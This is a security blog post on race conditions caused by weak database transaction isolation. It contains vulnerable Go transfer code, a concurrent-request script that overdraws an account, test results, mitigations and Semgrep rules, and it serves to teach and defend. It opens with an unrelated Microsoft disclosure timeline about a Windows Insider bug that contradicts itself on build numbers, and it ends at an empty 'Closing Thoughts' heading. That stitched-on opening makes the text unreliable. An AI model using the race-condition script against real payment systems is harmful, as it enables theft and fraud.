The details of this issue were reported to the Microsoft Security Response Center on December 1, 2023. The bug was confirmed on the latest Windows Insider Preview build at the time of the reporting: 26002.1000.rs_prerelease.231118-1559.

Date	Status
12/01/2023	The vulnerability reported to Microsoft
02/09/2024	Additional details requested
02/09/2024	Additional details provided
05/09/2024	Issue closed as non-reproducible: “We completed the assessment and because we weren’t able to reproduce the issue with the repro steps provide _[sic]_. We don’t expect any further action on the case and we will proceed with closing out the case.”

We asked Microsoft to reopen the ticket and the blogpost draft was shared with Microsoft prior to the publication.

As of now, the issue is still not fixed. We confirmed that it is affecting the current latest Windows Insider Preview build 10.0.25120.751.

A Race to the Bottom - Database Transactions Undermining Your AppSec

2024-07-11T00:00:00+02:00

Introduction

Databases are a crucial part of any modern application. Like any external dependency, they introduce additional complexity for the developers building an application. In the real world, however, they are usually considered and used as a black box which provides storage functionality.

This post aims to shed light on a particular aspect of the complexity databases introduce which is often overlooked by developers, namely concurrency control. The best way to do that is to start off by looking at a fairly common code pattern we at Doyensec see in our day-to-day work:

func (db *Db) Transfer(source int, destination int, amount int) error {
  ctx := context.Background()

  conn, err := pgx.Connect(ctx, db.databaseUrl)
  defer conn.Close(ctx)

  // (1)
  tx, err := conn.BeginTx(ctx, pgx.TxOptions{})

  var user User
  // (2)
  err = conn.
    QueryRow(ctx, "SELECT id, name, balance FROM users WHERE id = $1", source).
    Scan(&user.Id, &user.Name, &user.Balance)

  // (3)
  if amount <= 0 || amount > user.Balance {
    tx.Rollback(ctx)
    return fmt.Errorf("invalid transfer")
  }

  // (4)
  _, err = conn.Exec(ctx, "UPDATE users SET balance = balance - $2 WHERE id = $1", source, amount)
  _, err = conn.Exec(ctx, "UPDATE users SET balance = balance + $2 WHERE id = $1", destination, amount)

  // (5)
  err = tx.Commit(ctx)
  return nil
}

Note: All error checking has been removed for clarity.

For the readers not familiar with Go, here’s a short summary of what the code is doing. We can assume that the application will initially perform authentication and authorization on the incoming HTTP request. When all required checks have passed, the db.Transfer function handling the database logic will be called. At this point the application will:

1. Establish a new database transaction
2. Read the source account’s balance
3. Verify that the transfer amount is valid with regard to the source account’s balance and the application’s business rules
4. Update the source and destination accounts’ balances appropriately
5. Commit the database transaction

A transfer can be made by making a request to the /transfer endpoint, like so:

POST /transfer HTTP/1.1
Host: localhost:9009
Content-Type: application/json
Content-Length: 31

{
    "source":1,
    "destination":2,
    "amount":50
}

We specify the source and destination account IDs, and the amount to be transferred between them. The full source code, and other sample apps developed for this research can be found in our playground repo.

Before continuing reading, take a minute and review the code to see if you can spot any issues.

Notice anything? At first look, the implementation seems correct. Sufficient input validation, bounds and balance checks are performed, no possibility of SQL injection, etc. We can also verify this by running the application and making a few requests. We’ll see that transfers are being accepted until the source account’s balance reaches zero, at which point the application will start returning errors for all subsequent requests.

Fair enough. Now, let’s try some more dynamic testing. Using the following Go script, let us try and make 10 concurrent requests to the /transfer endpoint. We’d expect that two requests will be accepted (two transfers of 50 with an initial balance of 100) and the rest will be rejected.

func transfer() {
	client := &http.Client{}

	body := transferReq{
		From:   1,
		To:     2,
		Amount: 50,
	}
	bodyBuffer := new(bytes.Buffer)
	json.NewEncoder(bodyBuffer).Encode(body)

	req, err := http.NewRequest("POST", "http://localhost:9009/transfer", bodyBuffer)
	if err != nil {
		panic(err)
	}
	req.Header.Add("Content-Type", `application/json`)
	resp, err := client.Do(req)
	if err != nil {
		panic(err)
	} else if _, err := io.Copy(os.Stdout, resp.Body); err != nil {
		panic(err)
	}
	fmt.Printf(" / status code => %v\n", resp.StatusCode)
}

func main() {
	for i := 0; i < 10; i++ {
		// run transfer as a goroutine
		go transfer()
	}
	time.Sleep(time.Second * 2)
	fmt.Printf("done.\n")
}

However, running the script we see something different. We see that almost all, if not all, of the requests were accepted and successfully processed by the application server. Viewing the balance of both accounts with the /dump endpoint will show that the source account has a negative balance.

We have managed to overdraw our account, effectively making money out of thin air! At this point, any person would be asking “why?” and “how?”. To answer them, we first need to take a detour and talk about databases.

Database Transactions and Isolation Levels

Transactions are a way to define a logical unit of work within a database context. Transactions consist of multiple database operations which need to be successfully executed, for the unit to be considered complete. Any failure would result in the transaction being reverted, at which point the developer needs to decide whether to accept the failure or retry the operation. Transactions are a way to ensure ACID properties for database operations. While all properties are important to ensure data correctness and safety, for this post we’re only interested in the “I” or Isolation.

In short, Isolation defines the level to which concurrent transactions will be isolated from each other. This ensures they always operate on correct data and don’t leave the database in an inconsistent state. Isolation is a property which is directly controllable by developers. The ANSI SQL-92 standard defines four isolation levels, which we will take a look at in more detail later on, but first we need to understand why we need them.

Why Do We Need Isolation?

Isolation levels were introduced to eliminate read phenomena, that is, unexpected behaviors which can be observed when concurrent transactions operate on the same set of data. The best way to understand them is with short examples, graciously borrowed from Wikipedia.

Dirty Reads

Dirty reads allow transactions to read uncommitted changes made by concurrent transactions.

-- tx1
BEGIN;
SELECT age FROM users WHERE id = 1; -- age = 20 
-- tx2
BEGIN;
UPDATE users SET age = 21 WHERE id = 1;
-- tx1
SELECT age FROM users WHERE id = 1; -- age = 21 
-- tx2
ROLLBACK; -- the value returned by tx1's second read was never committed

Non-Repeatable Reads

Non-repeatable reads allow sequential SELECT operations to return different results as a result of concurrent transactions modifying the same table entry.

-- tx1
BEGIN;
SELECT age FROM users WHERE id = 1; -- age = 20 
-- tx2
UPDATE users SET age = 21 WHERE id = 1;
COMMIT;
-- tx1
SELECT age FROM users WHERE id = 1; -- age = 21

Phantom Reads

Phantom reads allow sequential SELECT operations on a set of entries to return different results due to modifications done by concurrent transactions.

-- tx1
BEGIN;
SELECT name FROM users WHERE age > 17; -- returns [Alice, Bob]
-- tx2
BEGIN;
INSERT INTO users VALUES (3, 'Eve', 26);
COMMIT;
-- tx1
SELECT name FROM users WHERE age > 17; -- returns [Alice, Bob, Eve]

In addition to the phenomena defined in the standard, behaviors such as “Read Skews”, “Write Skews” and “Lost Updates” can be observed in the real world.

Lost Updates

Lost updates occur when concurrent transactions perform an update on the same entry.

-- tx1
BEGIN;
SELECT * FROM users WHERE id = 1;
-- tx2
BEGIN;
SELECT * FROM users WHERE id = 1;
UPDATE users SET name = 'alice' WHERE id = 1;
COMMIT; -- name set to 'alice'
-- tx1
UPDATE users SET name = 'bob' WHERE id = 1;
COMMIT; -- name set to 'bob'

This execution flow results in the change performed by tx2 to be overwritten by tx1.

Read and write skews usually arise when the operations are performed on two or more entries that have a foreign-key relationship. The examples below assume that the database contains two tables: a users table which stores information about a particular user, and a change_log table which stores information about the user who performed the latest change of the target user’s name column:

CREATE TABLE users(
  id INT PRIMARY KEY NOT NULL, 
  name TEXT NOT NULL
);

CREATE TABLE change_log(
  id INT PRIMARY KEY NOT NULL, 
  updated_by VARCHAR NOT NULL, 
  user_id INT NOT NULL,
  CONSTRAINT user_fk FOREIGN KEY (user_id) REFERENCES users(id)
);

Read Skews

If we assume that we have the following sequence of execution:

-- tx1
BEGIN;
SELECT * FROM users WHERE id = 1; -- returns 'old_name'
-- tx2
BEGIN;
UPDATE users SET name = 'new_name' WHERE id = 1;
UPDATE change_log SET updated_by = 'Bob' WHERE user_id = 1;
COMMIT;
-- tx1
SELECT * FROM change_log WHERE user_id = 1; -- returns Bob

the view of the tx1 transaction is that the user Bob performed the last change on the user with ID 1, setting their name to old_name.

Write Skews

In the sequence of operations shown below, tx1 will perform its update under the assumption that the user’s name is Alice and there were no prior changes on the name.

-- tx1
BEGIN;
SELECT * FROM users WHERE id = 1; -- returns Alice
SELECT * FROM change_log WHERE user_id = 1; -- returns an empty set
-- tx2
BEGIN;
SELECT * FROM users WHERE id = 1; 
UPDATE users SET name = 'Bob' WHERE id = 1; -- new name set
COMMIT;
-- tx1
UPDATE users SET name = 'Eve' WHERE id = 1; -- new name set
COMMIT;

However, tx2 performed its changes before tx1 was able to complete. This results in tx1 performing an update based on state which was changed during its execution.

Isolation levels are designed to guard against zero or more of these read phenomena. Let’s look at them in more detail.

Read Uncommitted

Read Uncommitted (RU) is the lowest isolation level provided. At this level, all phenomena discussed above can be observed, including reading uncommitted data, as the name suggests. While transactions using this isolation level can result in higher throughput in highly concurrent environments, it does mean that concurrent transactions will likely operate with inconsistent data. From a security standpoint, this is not a desirable property of any business-critical operation.

Thankfully, this is not the default in any database engine, and needs to be explicitly set by developers when creating a new transaction.

Read Committed

Read Committed (RC) builds on top of the previous level’s guarantee and completely prevents dirty reads. However, it does allow other transactions to modify, insert, or delete data between individual operations of the running transaction, which can result in non-repeatable and phantom reads.

Read Committed is the default isolation level in most database engines. MySQL is an outlier here: its InnoDB engine defaults to Repeatable Read.

Repeatable Read

In similar fashion, Repeatable Read (RR) improves on the previous isolation level, adding a guarantee that non-repeatable reads will also be prevented. The transaction will view only data which was committed at the start of the transaction. Phantom reads can still be observed at this level.

Serializable

Finally, we have the Serializable (S) isolation level. The highest level is designed to prevent all read phenomena. The result of concurrently executing multiple transactions with Serializable isolation will be equivalent to them being executed in serial order.
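The four levels can be summarized as a small lookup table. The Go sketch below simply encodes the descriptions above (the minimum guarantees of the standard); the type and function names are our own, and individual engines may be stricter than the standard requires.

```go
package main

import "fmt"

type Phenomenon string
type Level string

const (
	DirtyRead         Phenomenon = "dirty read"
	NonRepeatableRead Phenomenon = "non-repeatable read"
	PhantomRead       Phenomenon = "phantom read"
)

const (
	ReadUncommitted Level = "READ UNCOMMITTED"
	ReadCommitted   Level = "READ COMMITTED"
	RepeatableRead  Level = "REPEATABLE READ"
	Serializable    Level = "SERIALIZABLE"
)

// permitted lists the standard read phenomena each level still allows,
// as described in the sections above.
var permitted = map[Level][]Phenomenon{
	ReadUncommitted: {DirtyRead, NonRepeatableRead, PhantomRead},
	ReadCommitted:   {NonRepeatableRead, PhantomRead},
	RepeatableRead:  {PhantomRead},
	Serializable:    {},
}

// allows reports whether phenomenon p can be observed at level l.
func allows(l Level, p Phenomenon) bool {
	for _, q := range permitted[l] {
		if q == p {
			return true
		}
	}
	return false
}

func main() {
	for _, l := range []Level{ReadUncommitted, ReadCommitted, RepeatableRead, Serializable} {
		fmt.Printf("%-16s still allows: %v\n", l, permitted[l])
	}
}
```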

Data Races and Race Conditions

Now that we have that covered, let’s circle back to the original example. If we assume that the example was using Postgres and we’re not explicitly setting the isolation level, we’ll be using the Postgres default: Read Committed. This setting will protect us from dirty reads, and phantom or non-repeatable reads are not a concern, since we’re not performing multiple reads within the transaction.

The main reason why our example is vulnerable boils down to concurrent transaction execution and insufficient concurrency control. We can enable database logging to easily see what is being executed on the database level when our example application is being exploited.

Pulling the logs for our example, we can see something similar to:

[TX1] LOG:  BEGIN ISOLATION LEVEL READ COMMITTED
[TX2] LOG:  BEGIN ISOLATION LEVEL READ COMMITTED
[TX1] LOG:  SELECT id, name, balance FROM users WHERE id = 2
[TX2] LOG:  SELECT id, name, balance FROM users WHERE id = 2
[TX1] LOG:  UPDATE users SET balance = balance - 50 WHERE id = 2
[TX2] LOG:  UPDATE users SET balance = balance - 50 WHERE id = 2
[TX1] LOG:  UPDATE users SET balance = balance + 50 WHERE id = 1
[TX1] LOG:  COMMIT
[TX2] LOG:  UPDATE users SET balance = balance + 50 WHERE id = 1
[TX2] LOG:  COMMIT

What we initially notice is that the individual operations of a single transaction are not executed as a single unit. Their individual operations are interweaved, contradicting how the initial transaction definition described them (i.e., a single unit of execution). This interweaving occurs as a result of transactions being executed concurrently.

Concurrent Transaction Execution

Databases are designed to execute their incoming workload concurrently. This results in an increased throughput and ultimately a more performant system. While implementation details can vary between different database vendors, at a high level concurrent execution is implemented using “workers”. Databases define a set of workers whose job is to execute all transactions assigned to them by a component usually named “scheduler”. The workers are independent of each other and can be conceptually thought of as application threads. Like application threads, they are subject to context switching, meaning that they can be interrupted mid-execution, allowing other workers to perform their work. As a result we can end up having partial transaction execution, resulting in the interweaved operations we saw in the log output above. As with multithreaded application code, without proper concurrency control, we run the risk of encountering data races and race conditions.

Going back to the database logs, we can also see that both transactions are trying to perform an update on the same entry, one after the other (lines #5 and #6). Such concurrent modification will be prevented by the database by setting a lock on the modified entry, protecting the change until the transaction that made the change completes or fails. Database vendors are free to implement any number of different lock types, but most of them can be simplified to two types: shared and exclusive locks.

Shared (or read) locks are acquired on table entries read from the database. They are not mutually exclusive, meaning multiple transactions can hold a shared lock on the same entry.

Exclusive (or write) locks, as the name suggests, are exclusive. They are acquired when a write/update operation is performed, and only one lock of this type can be active per table entry. This helps prevent concurrent changes on the same entry.
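This simplified two-lock model boils down to a tiny compatibility check. The Go sketch below is our own illustration of it, assuming the usual rule that an exclusive lock conflicts with every other lock on the same entry; real engines have more lock modes and finer rules.

```go
package main

import "fmt"

type LockMode int

const (
	Shared LockMode = iota
	Exclusive
)

func (m LockMode) String() string {
	if m == Shared {
		return "shared"
	}
	return "exclusive"
}

// compatible reports whether a lock of mode requested can be granted on an
// entry while another transaction already holds a lock of mode held on it.
// In this simplified model only shared+shared can coexist.
func compatible(held, requested LockMode) bool {
	return held == Shared && requested == Shared
}

func main() {
	modes := []LockMode{Shared, Exclusive}
	for _, held := range modes {
		for _, req := range modes {
			fmt.Printf("held=%-9v requested=%-9v granted=%v\n", held, req, compatible(held, req))
		}
	}
}
```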

Database vendors provide a simple way to query active locks at any point during a transaction’s execution, provided you can pause it or are executing it manually. In Postgres for example, the following query will show the active locks:

SELECT locktype, relation::regclass, mode, transactionid AS tid, virtualtransaction AS vtid, pid, granted, waitstart FROM pg_catalog.pg_locks l LEFT JOIN pg_catalog.pg_database db ON db.oid = l.database WHERE (db.datname = '<db_name>' OR db.datname IS NULL) AND NOT pid = pg_backend_pid() ORDER BY pid;

A similar query can be used for MySQL:

SELECT thread_id, lock_data, lock_type, lock_mode, lock_status FROM performance_schema.data_locks WHERE object_schema = '<db_name>';

For other database vendors refer to the appropriate documentation.

Root Cause

The isolation level used in our example (Read Committed) will not place any locks when data is being read from the database. This means that only the write operations will be placing locks on the modified entries. If we visualize this, our issue becomes clear:

The lack of locking on the SELECT operation allows for concurrent access to a shared resource. This introduces a TOCTOU (time-of-check, time-of-use) issue, leading to an exploitable race condition. Even though the issue is not visible in the application code itself, it becomes obvious in the database logs.

Applying Theory in Practice

Different code patterns can allow for different exploit scenarios. For our particular example, the main difference will be how the new application state is calculated, or more specifically, which values are used in the calculation.

Pattern #1 - Calculations Using Current Database State

In the original example, we can see that the new balance calculations will happen on the database server. This is due to how the UPDATE operation is structured. It contains a simple addition/subtraction operation, which will be calculated by the database using the current value of the balance column at the time of execution. Putting it all together, we end up with an execution flow shown on the graph below.

Using the database’s default isolation level, the SELECT operation will be executed before any locks are created and the same entry will be returned to the application code. The transaction which gets its first UPDATE to execute will enter the critical section and will be allowed to execute its remaining operations and commit. During that time, all other transactions will hang and wait for the lock to be released. By committing its changes, the first transaction will change the state of the database, effectively breaking the assumption under which the waiting transaction was initiated. When the second transaction executes its UPDATEs, the calculations will be performed on the updated values, leaving the application in an incorrect state.
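The flow can be replayed without a database. The Go sketch below is an in-memory model under simplifying assumptions: every transaction performs its SELECT before any UPDATE runs, and the UPDATEs then execute one after another as the row lock is passed along. The simulate function and the account values are ours, mirroring the earlier test (balance 100, transfers of 50).

```go
package main

import "fmt"

// check mirrors step (3): the amount is validated against the balance
// the transaction observed when it executed its SELECT.
func check(observed, amount int) bool {
	return amount > 0 && amount <= observed
}

// simulate replays n concurrent transfers of 50 from account 1 to account 2.
func simulate(n int) map[int]int {
	balances := map[int]int{1: 100, 2: 0}

	// Phase 1: all transactions read the source balance. No locks are taken,
	// so every one of them observes the same value.
	observed := make([]int, n)
	for i := range observed {
		observed[i] = balances[1]
	}

	// Phase 2: each transaction validates against its stale read, then the
	// database applies "balance = balance - 50" to the current row value.
	for i := range observed {
		if check(observed[i], 50) {
			balances[1] -= 50
			balances[2] += 50
		}
	}
	return balances
}

func main() {
	fmt.Println(simulate(10)) // map[1:-400 2:500]
}
```

All ten checks pass because each one compares against the balance of 100 read in phase 1, while the relative updates keep stacking on top of each other.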

Pattern #2 - Calculations Using Stale Values

Working with stale values happens when the application code reads the current state of the database entry, performs the required calculations at the application layer and uses the newly calculated value in an UPDATE operation. We can perform a simple refactoring to our initial example and move the “new value” calculation to the application layer.

func (db *Db) Transfer(source int, destination int, amount int) error {
  ctx := context.Background()
  conn, err := pgx.Connect(ctx, db.databaseUrl)
  defer conn.Close(ctx)

  tx, err := conn.BeginTx(ctx, pgx.TxOptions{})

  var userSrc User
  err = conn.
    QueryRow(ctx, "SELECT id, name, balance FROM users WHERE id = $1", source).
    Scan(&userSrc.Id, &userSrc.Name, &userSrc.Balance)

  var userDest User
  err = conn.
    QueryRow(ctx, "SELECT id, name, balance FROM users WHERE id = $1", destination).
    Scan(&userDest.Id, &userDest.Name, &userDest.Balance)

  if amount <= 0 || amount > userSrc.Balance {
    tx.Rollback(ctx)
    return fmt.Errorf("invalid transfer")
  }

  // note: balance calculations moved to the application layer
  newSrcBalance := userSrc.Balance - amount
  newDestBalance := userDest.Balance + amount

  _, err = conn.Exec(ctx, "UPDATE users SET balance = $2 WHERE id = $1", source, newSrcBalance)
  _, err = conn.Exec(ctx, "UPDATE users SET balance = $2 WHERE id = $1", destination, newDestBalance)

  err = tx.Commit(ctx)
  return nil
}

If two or more concurrent requests call the db.Transfer function at the same time, there is a high probability that the initial SELECT will be executed before any locks are created. All function calls will read the same value from the database. The amount verification will pass successfully and the new balances will be calculated. Let’s see how this scenario affects our database state if we run the previous test case:

At first glance, the database state doesn’t show any inconsistencies. That is because both transactions performed their amount calculation based on the same state and both executed UPDATE operations with the same amounts. Even though the database state was not corrupted, it’s worth bearing in mind that we were able to execute the transaction more times than the business logic should allow. For example, an application built using a microservice architecture might implement business logic such as:

If Service T assumes that all incoming requests from the main application are valid, and does not perform any additional validation itself, it will happily process any incoming requests. The race condition described before allows us to exploit such behavior and call the downstream Service T multiple times, effectively performing more transfers than the business requirements would allow.

This pattern can also be (ab)used to corrupt the database state. Namely, we can perform multiple transfers from the source account to different destination accounts.

With this exploit, both concurrent transactions will initially see a source balance of 100, which will pass the amount verification.
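A small in-memory model shows the resulting corruption. As before, this Go sketch assumes that all transactions finish their SELECTs before any UPDATE runs; the simulateStale function, the account IDs and the amounts (two transfers of 50 from a balance of 100) are illustrative assumptions.

```go
package main

import "fmt"

type transfer struct{ src, dst, amount int }

// simulateStale replays concurrent transfers where the new balances are
// computed in application code from values read earlier (Pattern #2).
func simulateStale(balances map[int]int, transfers []transfer) map[int]int {
	type snapshot struct{ src, dst int }

	// Phase 1: every transaction reads its source and destination rows.
	snaps := make([]snapshot, len(transfers))
	for i, t := range transfers {
		snaps[i] = snapshot{balances[t.src], balances[t.dst]}
	}

	// Phase 2: every transaction validates and then writes absolute values
	// derived from its own, by now stale, snapshot.
	for i, t := range transfers {
		if t.amount <= 0 || t.amount > snaps[i].src {
			continue // rejected as an invalid transfer
		}
		balances[t.src] = snaps[i].src - t.amount
		balances[t.dst] = snaps[i].dst + t.amount
	}
	return balances
}

func main() {
	balances := map[int]int{1: 100, 2: 0, 3: 0}
	out := simulateStale(balances, []transfer{{1, 2, 50}, {1, 3, 50}})

	total := 0
	for _, b := range out {
		total += b
	}
	fmt.Println(out, total) // map[1:50 2:50 3:50] 150
}
```

The source account was debited only once, since the second write of 50 overwrote the first, but both destinations were credited. The system now holds 150 where it started with 100.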

Exploitation in the Real World

If you run the sample application locally, with a database running on the same machine, you will likely see that most, if not all, of the requests made to the /transfer endpoint will be accepted by the application server. The low latency between client, application server and database server allows all requests to hit the race window and successfully commit. However, real-world application deployments are much more complex, running in cloud environments, deployed using Kubernetes clusters, placed behind reverse proxies and protected by firewalls.

We were curious to see how difficult it is to hit the race window in a real-world context. To test that we set up a simple application, deployed in an AWS Fargate container, alongside another container running the selected database.

Testing was focused on three databases: Postgres, MySQL and MariaDB.

The application logic was implemented using two programming languages: Go and Node. These languages were chosen to allow us to see how their different concurrency models (Go’s goroutines vs. Node’s event loop) impact exploitability.

Finally, we specified three techniques of attacking the application:

1. simple multi-threaded loop
2. last-byte sync for HTTP/1.1
3. single packet attacks for HTTP/2.0

All of these were performed using BurpSuite’s extensions: “Intruder” for (1) and “Turbo Intruder” for (2) and (3).

Using this setup, we attacked the application by performing 20 requests using 10 threads/connections, transferring an amount of 50 from Bob (account ID 2 with a starting balance of 200) to Alice. Once the attack was done, we noted the number of accepted requests. Given a non-vulnerable application, there shouldn’t be more than 4 accepted requests.

This was performed 10 times, for each combination of application/database/attack method. The number of successfully processed requests was noted. From those numbers we conclude if a specific isolation level is exploitable or not. Those results can be found here.

Results and Observations

Our testing showed that if this pattern is present in an application, it is very likely that it can be exploited. In all cases, except for the Serializable level, we were able to exceed the expected number of accepted requests, overdrawing the account. The number of accepted requests varies between different technologies, but the fact that we were able to exceed it (and in some cases, to a significant degree) is sufficient to demonstrate the exploitability of the issue.

If an attacker is able to get a large number of requests to the server in the same instant, effectively creating conditions similar to local access, the number of accepted requests jumps up by a significant amount. So, to maximize the possibility of hitting the race window, testers should prefer methods such as last-byte sync or the single packet attack.

One outlier is Postgres’ Repeatable Read level. The reason it’s not vulnerable is that it implements an isolation level called Snapshot Isolation. The guarantees provided by this isolation level sit between Repeatable Read and Serializable, ultimately providing sufficient protection and mitigating the race conditions for our example.

The languages’ concurrency models did not have any notable impact on the exploitability of the race condition.

Mitigation

On a conceptual level, the fix only requires the start of the critical section to be moved to the beginning of the transaction. This will ensure that the transaction which first reads the entry gets exclusive access to it and is the only one allowed to commit. All others will wait for its completion.

Mitigation can be implemented in a number of ways. Some of them require manual work, while others come out of the box, provided by the database of choice. Let’s start by looking at the simplest and generally preferred way: setting the transaction isolation level to Serializable.

As mentioned before, the isolation level is a user/developer controlled property of a database transaction. It can be set by simply specifying it when creating a transaction:

BEGIN TRANSACTION;
SET TRANSACTION ISOLATION LEVEL SERIALIZABLE;

This may slightly vary from database to database, so it’s always best to consult the appropriate documentation. Usually ORMs or database drivers provide an application level interface for setting the desired isolation level. Postgres’ Go driver pgx allows users to do the following:

tx, err := conn.BeginTx(ctx, pgx.TxOptions{IsoLevel: pgx.Serializable})
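
For applications that use Go's standard database/sql package instead of calling pgx directly, the same request can be expressed through sql.TxOptions. The sketch below is only an illustration under that assumption: withSerializableTx is a hypothetical helper of ours, not part of any library, and whether the requested level is honored depends on the underlying driver.

```go
package main

import (
	"context"
	"database/sql"
	"fmt"
)

// serializableOpts requests the Serializable isolation level.
var serializableOpts = &sql.TxOptions{Isolation: sql.LevelSerializable}

// withSerializableTx (hypothetical helper) runs fn inside a Serializable
// transaction, rolling back if fn returns an error and committing otherwise.
func withSerializableTx(ctx context.Context, db *sql.DB, fn func(*sql.Tx) error) error {
	tx, err := db.BeginTx(ctx, serializableOpts)
	if err != nil {
		return err
	}
	if err := fn(tx); err != nil {
		_ = tx.Rollback()
		return err
	}
	return tx.Commit()
}

func main() {
	// No database connection is opened here; we only print the requested level.
	fmt.Println(serializableOpts.Isolation) // Serializable
}
```

Wrapping only the business-critical operation in such a helper keeps the stricter level scoped to the transactions that need it.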

It is worth noting that Serializable, being the highest isolation level, may have an impact on the performance of your application. However, its use can be limited to only the business-critical transactions. All other transactions can remain unchanged and be executed with the database’s default isolation level or any appropriate level for that particular operation.

One alternative to this method is implementing pessimistic locking via manual locking. The idea behind this method is that the business-critical transaction will obtain all required locks at the beginning and only release them when the transaction completes or fails. This ensures that no other concurrently executing transaction will be able to interfere. Manual locking can be performed by specifying the FOR SHARE or FOR UPDATE options in your SELECT operations:

SELECT id, name, balance FROM users WHERE id = 1 FOR UPDATE

This will instruct the database to place a shared or exclusive lock, respectively, on all entries returned by the read operation, effectively disallowing any modification to them until the lock is released. This method can, however, be error prone. There is always a possibility that other operations may get overlooked or new ones will be added without the FOR SHARE / FOR UPDATE option, potentially re-introducing the data race. Additionally, scenarios such as the one shown below may be possible at lower isolation levels.

The graph shows a scenario where ‘tx2’ performs validation on a value which becomes stale after tx1 commits, and ends up overwriting the update performed by tx1, leading to a Lost Update.
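
The interleaving described above can be replayed deterministically, without a database or real concurrency. The Go sketch below is an in-memory illustration only; the account type and the lostUpdate function are hypothetical names introduced for this example, and the amounts reuse the 200/50 values from our test setup.

```go
package main

import "fmt"

// account is an in-memory stand-in for a row in the users table.
type account struct{ balance int }

// lostUpdate replays the interleaving step by step: both transactions
// read and validate before either one writes.
func lostUpdate(start, amount int) (final int, accepted int) {
	row := account{balance: start}

	tx1Seen := row.balance // tx1 reads the balance
	tx2Seen := row.balance // tx2 reads the same, soon-to-be-stale value

	if tx1Seen >= amount { // tx1 validates and commits its write
		row.balance = tx1Seen - amount
		accepted++
	}
	if tx2Seen >= amount { // tx2 validates against the stale value...
		row.balance = tx2Seen - amount // ...and overwrites tx1's update
		accepted++
	}
	return row.balance, accepted
}

func main() {
	final, accepted := lostUpdate(200, 50)
	fmt.Println(final, accepted) // 150 2: two transfers accepted, only one deducted
}
```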

Finally, mitigation can also be implemented using optimistic locking. The conceptual opposite of pessimistic locking, optimistic locking expects that nothing will go wrong and only performs conflict detection at the end of the transaction. If a conflict is detected (i.e., underlying data was modified by a concurrent transaction), the transaction will fail and will need to be retried. This method is usually implemented using a logical clock, or a table column, whose value must not change during the execution of the transaction.

The simplest way to implement this is by introducing a version column in your table:

CREATE TABLE users(
  id INT PRIMARY KEY NOT NULL AUTO_INCREMENT,
  name TEXT NOT NULL,
  balance INT NOT NULL,
  -- version is a plain counter, bumped on every successful write
  version INT NOT NULL DEFAULT 1
);

The value of the version column must then always be verified when performing any write/update operation to the database, and incremented as part of the same statement. If the value has changed, the UPDATE matches no rows; the application must treat that as a conflict and fail the entire transaction.

UPDATE users SET balance = 100, version = version + 1 WHERE id = 1 AND version = <last_seen_version>
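
To make the version check concrete, here is a minimal in-memory Go sketch of the same compare-then-write logic. It does not talk to a database: the row type, updateBalance and errConflict are hypothetical names for this example, and incrementing the version on every successful write is an assumption of the sketch.

```go
package main

import (
	"errors"
	"fmt"
)

// row mirrors the balance and version columns of the users table.
type row struct {
	balance int
	version int
}

var errConflict = errors.New("version changed: retry the transaction")

// updateBalance mimics "UPDATE ... WHERE id = ? AND version = ?": the write is
// applied only if the version still matches the one the caller read earlier.
// Bumping the version on success is an assumption of this sketch.
func updateBalance(r *row, newBalance, lastSeenVersion int) error {
	if r.version != lastSeenVersion {
		return errConflict // the real UPDATE would affect zero rows
	}
	r.balance = newBalance
	r.version++
	return nil
}

func main() {
	acct := &row{balance: 200, version: 1}

	// Two transactions read the same snapshot of the row.
	tx1, tx2 := *acct, *acct

	fmt.Println(updateBalance(acct, tx1.balance-50, tx1.version)) // <nil>
	fmt.Println(updateBalance(acct, tx2.balance-50, tx2.version)) // version changed: retry the transaction
	fmt.Println(acct.balance, acct.version)                       // 150 2
}
```

The second writer is rejected instead of silently overwriting the first, and is expected to re-read the row and retry.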

Detection

If the application uses an ORM, setting the isolation level usually entails calling a setter function, or supplying it as a function parameter. On the other hand, if the application constructs database transactions using raw SQL statements, the isolation level will be supplied as part of the transaction’s BEGIN statement.

Both of those methods represent a pattern which can be searched for using tools such as Semgrep. So, if we assume that our application is built using Go and uses pgx to access data stored in a Postgres database, we can use the following Semgrep rules to detect instances of unspecified isolation levels.

1. Raw SQL Transaction

rules:
  - id: pgx-sql-tx-missing-isolation-level
    message: "SQL transaction without isolation level"
    languages:
      - go
    severity: WARNING
    patterns:
      - pattern: $CONN.Exec($CTX, $BEGIN)
      - metavariable-regex:
          metavariable: $BEGIN
          regex: ("begin transaction"|"BEGIN TRANSACTION")

2. Missing pgx Transaction Creation Options

rules:
  - id: pgx-tx-missing-options
    message: "Postgres transaction options not set"
    languages:
      - go
    severity: WARNING
    patterns:
      - pattern: $CONN.Begin($CTX)

3. Missing Isolation Level in pgx Transaction Creation Options

rules:
  - id: pgx-tx-missing-options-isolation
    message: "Postgres transaction isolation level not set"
    languages:
      - go
    severity: WARNING
    patterns:
      - pattern: $CONN.BeginTx($CTX, $OPTS)
      - metavariable-pattern:
          metavariable: $OPTS
          patterns:
            - pattern-not: >
                $PGX.TxOptions{..., IsoLevel:$LVL, ...}

All these patterns can be easily modified to suit your tech stack and database of choice.

It’s important to note that rules like these are not a complete solution. Integrating them blindly into an existing pipeline will result in a lot of noise. We would rather recommend using them to build an inventory of all transactions the application performs, and use that information as a starting point to review the application and apply hardening if it is required.
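
As a rough illustration of the inventory idea, the Go sketch below lists the lines on which a source file starts a transaction. It uses Go's standard go/ast package rather than Semgrep, and it matches purely on the method names Begin and BeginTx, so it will also report unrelated methods with those names. The sample snippet and the txCallLines function are hypothetical, introduced only for this example.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
)

// sample is a hypothetical snippet to scan; conn, ctx and opts are never
// resolved, since the parser only needs syntactically valid Go.
const sample = `package demo

func transfer() {
	tx, _ := conn.BeginTx(ctx, opts)
	_ = tx
	tx2, _ := conn.Begin(ctx)
	_ = tx2
}
`

// txCallLines returns the line numbers of every call to a method named
// Begin or BeginTx found in src.
func txCallLines(src string) ([]int, error) {
	fset := token.NewFileSet()
	file, err := parser.ParseFile(fset, "sample.go", src, 0)
	if err != nil {
		return nil, err
	}
	var lines []int
	ast.Inspect(file, func(n ast.Node) bool {
		call, ok := n.(*ast.CallExpr)
		if !ok {
			return true
		}
		if sel, ok := call.Fun.(*ast.SelectorExpr); ok &&
			(sel.Sel.Name == "Begin" || sel.Sel.Name == "BeginTx") {
			lines = append(lines, fset.Position(call.Pos()).Line)
		}
		return true
	})
	return lines, nil
}

func main() {
	lines, err := txCallLines(sample)
	fmt.Println(lines, err) // [4 6] <nil>
}
```

Each reported location is a candidate for manual review, not a finding in itself.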

Closing Thoughts

